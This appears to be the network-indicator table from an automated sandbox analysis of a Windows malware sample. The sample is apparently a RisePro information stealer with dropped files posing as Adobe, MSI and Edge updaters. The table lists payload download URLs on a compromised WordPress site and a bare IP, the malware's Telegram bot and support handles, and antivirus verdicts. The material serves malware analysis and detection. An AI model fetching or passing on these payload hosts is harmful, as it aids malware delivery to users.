https://easy2buy.ae/wp-content/plugins/header-footer-elementor/assets/css/header-footer-elementor.cs | file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | false
                                  • 4%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://easy2buy.ae/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.7file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                  • 4%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://easy2buy.ae/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.14.0file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                  • 4%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://easy2buy.ae/wp-content/upgrade/k.exeYfile.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://easy2buy.ae/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=5.15.file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://easy2buy.ae/wp-content/plugins/qi-addons-for-elementor/inc/shortcodes/parallax-images/assetsfile.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://easy2buy.ae:80/wp-content/upgrade/k.exefile.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 5%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://easy2buy.ae/wp-admin/admin-ajax.phpfile.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                  • 4%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://easy2buy.ae/wp-content/plugins/qi-blocks/assets/dist/main.css?ver=6.5.3file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                  • 4%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://easy2buy.ae/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://easy2buy.ae/property-management-and-letting/file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                  • 4%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://easy2buy.ae/wp-content/uploads/2023/06/logo-white.pngfile.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                  • 4%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://easy2buy.ae/wp-content/themes/newhome/assets/js/main.min.js?ver=6.5.3file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                  • 4%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://t.me/risepro_botRomaniafile.exe, 00000000.00000003.2085945219.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086587679.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086176899.00000000017B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://t.me/risepro_botisepro_bot0file.exe, 00000000.00000003.2085945219.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086587679.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086176899.00000000017B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://easy2buy.ae/wp-content/plugins/newhome-core/inc/maps/assets/js/google-map.js?ver=6.5.3file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                      • 4%, Virustotal, Browse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://easy2buy.ae/contact/EdgeMS2.exe.0.drfalse
                                      • 4%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://easy2buy.ae/wp-content/uploads/elementor/css/custom-frontend-lite.min.css?ver=1690457761file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                      • 4%, Virustotal, Browse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://easy2buy.ae/#/schema/logo/image/EdgeMS2.exe.0.drfalse
                                      • 4%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://easy2buy.ae/wp-content/plugins/ht-mega-for-elementor/assets/css/htmega-keyframes.css?ver=2.2file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://embed.tawk.to/64c7994d94cf5d49dc678105/1h6lqtm4gfile.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                        high
                                        https://easy2buy.ae/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?vefile.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://easy2buy.ae/services/file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                        • 4%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://easy2buy.ae/feed/file.exe, 00000000.00000002.3215883795.0000000006321000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2601798968.0000000006320000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                        • 4%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://easy2buy.ae/wp-content/plugins/newhome-core/assets/css/newhome-core.min.css?ver=6.5.3file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                        • 4%, Virustotal, Browse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://easy2buy.ae/xmlrpc.php?rsdfile.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                        • 4%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://easy2buy.ae/wp-content/uploads/2023/03/error-page-bg-img.jpg);file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                        • 4%, Virustotal, Browse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://easy2buy.ae:80/ntControlSetfile.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://193.233.132.175/server/k/l2.exerCAfile.exe, 00000000.00000003.2085945219.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086587679.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086176899.00000000017B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://easy2buy.ae/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.2file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                        • 4%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://calendly.com/prokopf/online-consultationEdgeMS2.exe.0.drfalse
                                          high
                                          https://easy2buy.ae/wp-content/plugins/ht-mega-for-elementor/assets/js/popper.min.js?ver=2.2.0file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://easy2buy.ae/wp-content/plugins/qi-blocks/inc/slider/assets/plugins/5.4.5/swiper.min.css?ver=file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://easy2buy.ae/wp-content/uploads/2023/06/logo.pngfile.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                          • 4%, Virustotal, Browse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://easy2buy.ae/wp-content/uploads/elementor/css/global.css?ver=1690457762file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                          • 4%, Virustotal, Browse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://easy2buy.ae/wp-content/plugins/qi-addons-for-elementor/assets/css/main.min.css?ver=6.5.3file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                          • 4%, Virustotal, Browse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://easy2buy.ae/wp-includes/js/jquery/jquery.min.js?ver=3.7.1file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                          • 4%, Virustotal, Browse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://easy2buy.ae/wp-content/plugins/qode-framework/inc/common/assets/plugins/select2/select2.fullfile.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                          • 4%, Virustotal, Browse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://easy2buy.ae/wp-content/plugins/newhome-core/inc/icons/font-awesome/assets/css/all.min.css?vefile.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dllfile.exe, 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpfalse
                                            high
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.2084200905.0000000006308000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079811279.0000000006304000.00000004.00000020.00020000.00000000.sdmp, XT01mi44PjK3Web Data.0.dr, 7Uefi7OpyFd1Web Data.0.dr, niRQM4iEj4A_Web Data.0.drfalse
                                              high
                                              https://easy2buy.ae/wp-content/uploads/2023/06/cropped-fav-192x192.pngfile.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://easy2buy.ae/wp-content/uploads/elementor/css/custom-widget-icon-box.min.csfile.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://t.me/RiseProSUPPORTfile.exe, 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, _LQmmrlytjrHiMTfplY7yVS.zip.0.drfalse
                                                high
                                                https://easy2buy.ae/about/EdgeMS2.exe.0.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://schema.orgfile.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.0000000006321000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2601798968.0000000006320000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                                  high
                                                  https://easy2buy.ae/wp-content/plugins/header-footer-elementor/inc/js/frontend.js?ver=1.6.14file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://www.ecosia.org/newtab/file.exe, 00000000.00000003.2084200905.0000000006308000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079811279.0000000006304000.00000004.00000020.00020000.00000000.sdmp, XT01mi44PjK3Web Data.0.dr, 7Uefi7OpyFd1Web Data.0.dr, niRQM4iEj4A_Web Data.0.drfalse
                                                    high
                                                    https://easy2buy.ae/wp-content/themes/newhome/assets/css/main.min.css?ver=6.5.3file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brD87fZN3R3jFeplaces.sqlite.0.drfalse
                                                      high
                                                      https://easy2buy.ae/arranging-residential-visa/EdgeMS2.exe.0.drfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://gmpg.org/xfn/11file.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                                        high
                                                        https://easy2buy.ae/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wcfile.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
| URL | Source | Malicious | Antivirus detection | Reputation |
|---|---|---|---|---|
| https://easy2buy.ae | EdgeMS2.exe.0.dr | false | Avira URL Cloud: safe | unknown |
| https://easy2buy.ae/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?ver | file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | false | Avira URL Cloud: malware | unknown |
| https://easy2buy.ae/wp-includes/js/jquery/ui/tabs.min.js?ver=1.13.2 | file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | false | Avira URL Cloud: safe | unknown |
| https://schema.org/WPHeader | file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | false | | high |
| https://easy2buy.ae/wp-content/themes/newhome/style.css?ver=6.5.3 | file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | false | Avira URL Cloud: malware | unknown |
| https://ipinfo.io/ | file.exe, 00000000.00000002.3215228010.0000000001750000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://easy2buy.ae/wp-content/plugins/ht-mega-for-elementor/assets/css/animation.css?ver=2.2.0 | file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | false | Avira URL Cloud: malware | unknown |
| https://easy2buy.ae/wp-includes/js/hoverIntent.min.js?ver=1.10.2 | file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | false | Avira URL Cloud: safe | unknown |
| https://easy2buy.ae/wp-content/plugins/ht-mega-for-elementor/assets/js/htbbootstrap.js?ver=2.2.0 | file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | false | Avira URL Cloud: malware | unknown |
